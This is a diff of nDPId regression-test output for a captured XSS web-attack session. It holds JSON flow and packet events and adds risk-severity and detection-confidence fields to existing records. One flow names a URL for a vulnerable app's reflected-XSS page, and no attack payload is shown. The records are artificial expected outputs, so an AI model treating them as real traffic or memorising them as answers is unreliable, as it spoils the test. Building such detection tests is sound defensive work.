 00573{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1043,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499346957283,"flow_last_seen":1499346960891,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347089576,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52222,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1056,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":74,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347091102,"flow_last_seen":1499347091102,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347091102,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53516,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1056,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":74,"flow_packet_id":1,"flow_last_seen":1499347091102,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1499347091102,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8uhVAAD4GC7usEAABwKgKMtEMAFDkONpnAAAAAKACchBtWwAAAgQFtAQCCAoBOWByAAAAAAEDAwc="}
@@ -339,7 +339,7 @@
 00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1137,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":80,"flow_packet_id":1,"flow_last_seen":1499347101314,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1499347101314,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8HlBAAD4Gp4CsEAABwKgKMtF4AFDPTHQ7AAAAAKACchDeDgAAAgQFtAQCCAoBOWprAAAAAAEDAwc="}
 00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1138,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":80,"flow_packet_id":2,"flow_last_seen":1499347101314,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1499347101314,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ0XjCGItuz0x0PKAScSBRoQAAAgQFtAQCCAoD4zviATlqawEDAwc="}
 00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1139,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":80,"flow_packet_id":3,"flow_last_seen":1499347101315,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1499347101315,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0HlFAAD4Gp4esEAABwKgKMtF4AFDPTHQ8whiLb4AQAOXwqAAAAQEICgE5amsD4zvi"}
-00859{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1149,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":78,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1499347097460,"flow_last_seen":1499347102358,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":383,"flow_tot_l4_payload_len":383,"flow_avg_l4_payload_len":95,"midstream":0,"ts_msec":1499347102358,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53584,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"205.174.165.68","url":"205.174.165.68\/dv\/vulnerabilities\/xss_r\/","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64; rv:45.0) Gecko\/20100101 Firefox\/45.0"}}
+00965{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1149,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":78,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1499347097460,"flow_last_seen":1499347102358,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":383,"flow_tot_l4_payload_len":383,"flow_avg_l4_payload_len":95,"midstream":0,"ts_msec":1499347102358,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53584,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"205.174.165.68","url":"205.174.165.68\/dv\/vulnerabilities\/xss_r\/","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64; rv:45.0) Gecko\/20100101 Firefox\/45.0"}}
 00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1153,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":81,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347102609,"flow_last_seen":1499347102609,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347102609,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53638,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1153,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":81,"flow_packet_id":1,"flow_last_seen":1499347102609,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1499347102609,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8ux5AAD4GCrKsEAABwKgKMtGGAFBKzdCxAAAAAKACchAExgAAAgQFtAQCCAoBOWuvAAAAAAEDAwc="}
 00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1154,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":81,"flow_packet_id":2,"flow_last_seen":1499347102609,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1499347102609,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ0YYGn50FSs3QsqAScSAg+AAAAgQFtAQCCAoD4z0lATlrrwEDAwc="}
@@ -356,23 +356,23 @@
 00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1195,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":84,"flow_packet_id":1,"flow_last_seen":1499347107719,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1499347107719,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8GMdAAD4GrQmsEAABwKgKMtG8AFANSWhrAAAAAKACchClXQAAAgQFtAQCCAoBOXCsAAAAAAEDAwc="}
 00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1196,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":84,"flow_packet_id":2,"flow_last_seen":1499347107719,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1499347107719,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ0byrN2AMDUlobKAScSBU8gAAAgQFtAQCCAoD40IjATlwrAEDAwc="}
 00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1197,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":84,"flow_packet_id":3,"flow_last_seen":1499347107720,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1499347107720,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0GMhAAD4GrRCsEAABwKgKMtG8AFANSWhsqzdgDYAQAOXz+AAAAQEICgE5cK0D40Ij"}
-00696{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1207,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":13,"flow_first_seen":1499346976677,"flow_last_seen":1499346982914,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":5330,"flow_tot_l4_payload_len":6852,"flow_avg_l4_payload_len":527,"midstream":0,"ts_msec":1499347110022,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52300,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"}}
-00696{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1207,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1499346976999,"flow_last_seen":1499346982906,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1707,"flow_tot_l4_payload_len":2065,"flow_avg_l4_payload_len":206,"midstream":0,"ts_msec":1499347110022,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52318,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"}}
-00613{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1207,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499346976999,"flow_last_seen":1499346982607,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347110022,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52320,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00802{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1207,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":13,"flow_first_seen":1499346976677,"flow_last_seen":1499346982914,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":5330,"flow_tot_l4_payload_len":6852,"flow_avg_l4_payload_len":527,"midstream":0,"ts_msec":1499347110022,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52300,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}}
+00802{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1207,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1499346976999,"flow_last_seen":1499346982906,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1707,"flow_tot_l4_payload_len":2065,"flow_avg_l4_payload_len":206,"midstream":0,"ts_msec":1499347110022,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52318,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}}
+00649{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1207,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499346976999,"flow_last_seen":1499346982607,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347110022,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52320,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00574{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1207,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499346976999,"flow_last_seen":1499346982607,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347110022,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52320,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00613{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1207,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499346983175,"flow_last_seen":1499346988608,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347110022,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52386,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00649{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1207,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499346983175,"flow_last_seen":1499346988608,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347110022,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52386,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00574{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1207,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499346983175,"flow_last_seen":1499346988608,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347110022,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52386,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00613{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1207,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499346984469,"flow_last_seen":1499346989608,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347110022,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52400,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00649{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1207,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499346984469,"flow_last_seen":1499346989608,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347110022,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52400,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00574{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1207,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499346984469,"flow_last_seen":1499346989608,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347110022,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52400,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00613{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1207,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1499346985762,"flow_last_seen":1499346991610,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347110022,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52414,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00649{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1207,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1499346985762,"flow_last_seen":1499346991610,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347110022,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52414,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00574{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1207,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1499346985762,"flow_last_seen":1499346991610,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347110022,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52414,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00613{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1207,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499346988319,"flow_last_seen":1499346993610,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347110022,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52440,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00649{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1207,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499346988319,"flow_last_seen":1499346993610,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347110022,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52440,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00574{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1207,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499346988319,"flow_last_seen":1499346993610,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347110022,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52440,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00613{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1207,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499346989580,"flow_last_seen":1499346994610,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347110022,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52454,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00649{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1207,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499346989580,"flow_last_seen":1499346994610,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347110022,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52454,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00574{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1207,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499346989580,"flow_last_seen":1499346994610,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347110022,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52454,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00613{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1207,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499346992144,"flow_last_seen":1499346997611,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347110022,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52480,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00649{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1207,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499346992144,"flow_last_seen":1499346997611,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347110022,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52480,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00574{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1207,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499346992144,"flow_last_seen":1499346997611,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347110022,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52480,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00613{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1207,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499346993434,"flow_last_seen":1499346998611,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347110022,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52494,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00649{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1207,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499346993434,"flow_last_seen":1499346998611,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347110022,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52494,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00574{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1207,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499346993434,"flow_last_seen":1499346998611,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347110022,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52494,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1210,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":85,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347110266,"flow_last_seen":1499347110266,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347110266,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53718,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1210,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":85,"flow_packet_id":1,"flow_last_seen":1499347110266,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1499347110266,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8u39AAD4GClGsEAABwKgKMtHWAFDeH8hWAAAAAKACchByBAAAAgQFtAQCCAoBOXMpAAAAAAEDAwc="}
@@ -398,17 +398,17 @@
